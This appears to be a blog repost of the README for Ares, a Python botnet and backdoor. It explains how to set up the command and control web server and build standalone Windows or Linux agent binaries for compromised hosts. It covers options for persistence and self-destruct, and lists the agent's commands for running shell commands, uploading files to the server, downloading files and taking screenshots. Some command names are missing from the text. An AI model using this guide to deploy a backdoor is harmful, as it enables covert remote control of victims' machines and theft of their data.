Ares - Python Botnet and Backdoor

Ares - Python Botnet and Backdoor

Ares is a Python-based remote access tool.

It is made of two main programs:
  • A Command and Control server, which is a Web interface to administer the agents
  • An agent program, which is run on the compromised host, and ensures communication with the CNC
  • The Web interface can be run on any server running Python. The agent can be compiled to native executables using pyinstaller.


Install the Python requirements:
pip install -r requirements.txt
Initialize the database:
cd server
./ initdb
In order to compile Windows agents on Linux, setup wine (optional):


Run with the builtin (debug) server:
./ runserver -h -p 8080 --threaded
Or run using gunicorn:
gunicorn ares:app -b --threads 20
The server should now be accessible on http://localhost:8080


Run the Python agent (update to suit your needs):
cd agent
Build a new agent to a standalone binary:
./ -p Linux --server http://localhost:8080 -o agent
To see a list of supported options, run ./ -h
./agent/ -h
usage: [-h] -p PLATFORM --server SERVER -o OUTPUT
                  [--hello-interval HELLO_INTERVAL] [--idle_time IDLE_TIME]
                  [--max_failed_connections MAX_FAILED_CONNECTIONS]

Builds an Ares agent.

optional arguments:
  -h, --help            show this help message and exit
  -p PLATFORM, --platform PLATFORM
                        Target platform (Windows, Linux).
  --server SERVER       Address of the CnC server (e.g http://localhost:8080).
  -o OUTPUT, --output OUTPUT
                        Output file name.
  --hello-interval HELLO_INTERVAL
                        Delay (in seconds) between each request to the CnC.
  --idle_time IDLE_TIME
                        Inactivity time (in seconds) after which to go idle.
                        In idle mode, the agent pulls commands less often
                        (every <hello_interval> seconds).
  --max_failed_connections MAX_FAILED_CONNECTIONS
                        The agent will self destruct if no contact with the
                        CnC can be made <max_failed_connections> times in a
  --persistent          Automatically install the agent on first run.

Supported agent commands:
<any shell command>
Executes the command in a shell and return its output.

upload <local_file>
Uploads <local_file> to server.

download <url> <destination>
Downloads a file through HTTP(S).

zip <archive_name> <folder>
Creates a zip archive of the folder.

Takes a screenshot.

python <command|file>
Runs a Python command or local file.

Installs the agent.

Uninstalls the agent.

Kills the agent.

This help.

No comments

Powered by Blogger.